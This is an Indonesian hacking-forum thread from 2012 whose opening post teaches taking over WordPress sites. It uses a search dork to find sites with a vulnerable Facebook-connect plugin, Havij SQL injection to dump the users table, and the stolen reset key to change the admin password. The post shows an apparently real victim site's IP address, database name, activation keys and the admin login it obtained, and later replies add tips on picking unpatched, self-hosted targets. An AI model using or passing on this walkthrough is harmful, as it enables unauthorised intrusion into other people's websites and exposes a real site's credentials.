.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 SQLi Wordpress

Go down 
+9
Code:Core
raka98
CyberWild
exploi
digitalcat
KucingMangkal
robofics
rebel battle
boby1989
13 posters
PengirimMessage
boby1989
Top Nubie
Top Nubie



Jumlah posting : 44
Points : 133
Reputation : 7
Join date : 11.03.12

SQLi Wordpress Empty
PostSubyek: SQLi Wordpress   SQLi Wordpress Icon_minitimeTue Mar 13, 2012 10:36 am

[You must be registered and logged in to see this image.]

Siapa yang tidak kenal dengan wordpress. Ternyata wordpress dapat diexploitkan dengan 1 dork yang bisa dikembangkan. Disini saya akan mengajarkan sedikit dari exploit wordpress. DIsini kita belajar hack wordpress menggunakan SQL Injection.

Date : 24/02/2012 << Verified
Dork : inurl:"fbconnect_action=myhome" << bisa dikembangkan
Tools : havij
Exploit : Forgot Password
[You must be registered and logged in to see this link.]

disini saya akan memberi target...
[You must be registered and logged in to see this link.]
ganti jadi
[You must be registered and logged in to see this link.] fb
Analyzing [You must be registered and logged in to see this link.]
Host IP: 49.50.8.85
Web Server: Apache
Keyword Found: Facebook
Injection type is Integer
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 12
Valid String Column is 6
DB Server: MySQL
Current DB: h80929_wp2

INGET 1 hal penting,,,
[You must be registered and logged in to see this link.]

site = [You must be registered and logged in to see this link.]
QbiDH7xcZJT3d53XnKmB = activation key
admin = username

[You must be registered and logged in to see this link.]
klik lupa password
atau tambahkan <> ?action=lostpassword
[You must be registered and logged in to see this link.]
masukan admin << sebagai username yang ada di table wp-user yang discan melalui havij...

kalau disini saya mendapatkan keynya YU4X3EwGEaHGueg2NA7S
cara mendapatkannya menggunakan havij masuk ke table wp-user
jadi dengan exploit forgot password
[You must be registered and logged in to see this link.]
kita kembangkan...
[You must be registered and logged in to see this link.]

dan masukan password baru kita..
dan akhirnya login...
[You must be registered and logged in to see this link.]
username : admin
password : 34646331

SELAMAT ANDA SUDAH MASUK KE ADMINNYA...
Kembali Ke Atas Go down
rebel battle
Trainee
Trainee
rebel battle


Jumlah posting : 96
Points : 101
Reputation : 1
Join date : 30.12.11

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeTue Mar 13, 2012 1:15 pm

kok gak berhasil ya di belakanya butuh di tmba tanda >>>> ' ato ga ya...........?

SQLi Wordpress 1082720249
Kembali Ke Atas Go down
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeTue Mar 13, 2012 2:50 pm

eh ? udah banyak yang di patch kk
Kembali Ke Atas Go down
http://robofics.wordpress.com
KucingMangkal
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 2
Points : 2
Reputation : 0
Join date : 30.03.12

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeMon Apr 02, 2012 7:13 pm

gan.. hasil ane gagal.. SQLi Wordpress 1082720249
Spoiler:
Kembali Ke Atas Go down
robofics
VIP Member
VIP Member
robofics


Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeTue Apr 03, 2012 9:32 am

KucingMangkal wrote:
gan.. hasil ane gagal.. SQLi Wordpress 1082720249
Spoiler:

eet, kalo cari target jangan yang di host langsung dari sitenya wordpress kk.
soalnya kalo yang di host di servernya wp itu udah otomatis update.

jadi sekalinya ketemu yang vulnerable dia akan otomatis ter patch
SQLi Wordpress 1956393079
Kembali Ke Atas Go down
http://robofics.wordpress.com
digitalcat
BC Security
BC Security
digitalcat


Jumlah posting : 451
Points : 710
Reputation : 28
Join date : 31.10.11
Age : 42

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeTue Apr 03, 2012 12:50 pm

key wordpress apa aja ya
Kembali Ke Atas Go down
exploi
Newbie - Hack
Newbie - Hack
exploi


Jumlah posting : 408
Points : 464
Reputation : 13
Join date : 02.11.11
Lokasi : exploit

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeTue Apr 03, 2012 1:10 pm

wah main woedpresss neh
mau naya neh keynya apa aja ya :minta:
Kembali Ke Atas Go down
CyberWild
Moderator
Moderator
CyberWild


Jumlah posting : 1665
Points : 2310
Reputation : 104
Join date : 11.06.11
Age : 43
Lokasi : internet cloud

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeTue Apr 03, 2012 1:42 pm

kurang jelas tutornya
Kembali Ke Atas Go down
http://cyberwild.p.ht/
raka98
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 1
Points : 1
Reputation : 0
Join date : 11.05.12

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeSun May 13, 2012 9:57 pm

boby1989 wrote:
[You must be registered and logged in to see this image.]

Siapa yang tidak kenal dengan wordpress. Ternyata wordpress dapat diexploitkan dengan 1 dork yang bisa dikembangkan. Disini saya akan mengajarkan sedikit dari exploit wordpress. DIsini kita belajar hack wordpress menggunakan SQL Injection.

Date : 24/02/2012 << Verified
Dork : inurl:"fbconnect_action=myhome" << bisa dikembangkan
Tools : havij
Exploit : Forgot Password
[You must be registered and logged in to see this link.]

disini saya akan memberi target...
[You must be registered and logged in to see this link.]
ganti jadi
[You must be registered and logged in to see this link.] fb
Analyzing [You must be registered and logged in to see this link.]
Host IP: 49.50.8.85
Web Server: Apache
Keyword Found: Facebook
Injection type is Integer
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 12
Valid String Column is 6
DB Server: MySQL
Current DB: h80929_wp2

INGET 1 hal penting,,,
[You must be registered and logged in to see this link.]

site = [You must be registered and logged in to see this link.]
QbiDH7xcZJT3d53XnKmB = activation key
admin = username

[You must be registered and logged in to see this link.]
klik lupa password
atau tambahkan <> ?action=lostpassword
[You must be registered and logged in to see this link.]
masukan admin << sebagai username yang ada di table wp-user yang discan melalui havij...

kalau disini saya mendapatkan keynya YU4X3EwGEaHGueg2NA7S
cara mendapatkannya menggunakan havij masuk ke table wp-user
jadi dengan exploit forgot password
[You must be registered and logged in to see this link.]
kita kembangkan...
[You must be registered and logged in to see this link.]

dan masukan password baru kita..
dan akhirnya login...
[You must be registered and logged in to see this link.]
username : admin
password : 34646331

SELAMAT ANDA SUDAH MASUK KE ADMINNYA...

Mantep Om Succes .. thanks atas infonya
Kembali Ke Atas Go down
Code:Core
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 3
Points : 3
Reputation : 0
Join date : 01.07.12

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeMon Jul 02, 2012 10:16 am

digitalcat wrote:
key wordpress apa aja ya
terus gimana dong mencarinya... ayolah tidak ada salahnya berbagi ilmu :minta:
Kembali Ke Atas Go down
black.bottle
Top Nubie
Top Nubie
black.bottle


Jumlah posting : 34
Points : 38
Reputation : 0
Join date : 03.07.12
Age : 38

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeTue Jul 03, 2012 8:58 am

huum masih bingung mana yang buatan blogspot mana yang buatan wordpress padahal dah pke firebug wat amatin nya SQLi Wordpress 1082720249
Kembali Ke Atas Go down
ocim32
Pro Nubie
Pro Nubie
ocim32


Jumlah posting : 59
Points : 65
Reputation : 2
Join date : 28.01.12

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeThu Sep 06, 2012 3:30 pm

yang baru dong bray :minta:
Kembali Ke Atas Go down
bd
NuuBiiTooL
NuuBiiTooL
bd


Jumlah posting : 16
Points : 16
Reputation : 0
Join date : 20.12.12

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeSun Jan 06, 2013 1:16 am

kok gag dong ya hehee SQLi Wordpress 3529815765 SQLi Wordpress 1956393079
Kembali Ke Atas Go down
Lo@dinG
Administrator
Administrator
Lo@dinG


Jumlah posting : 434
Points : 874
Reputation : 22
Join date : 13.12.10
Age : 35
Lokasi : Dimana-mana ???

SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitimeWed Jan 09, 2013 11:29 am

udah ga work oom...

cari exploit yg baru donk oom..
Kembali Ke Atas Go down
http://www.black-c0de.org
Sponsored content





SQLi Wordpress Empty
PostSubyek: Re: SQLi Wordpress   SQLi Wordpress Icon_minitime

Kembali Ke Atas Go down
 
SQLi Wordpress
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi
» Hack wordpress
» SQLi Exposed [ebook]
» Apprendre WordPress 3
» vulnerability Themes Wordpress

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Web attack-
Navigasi: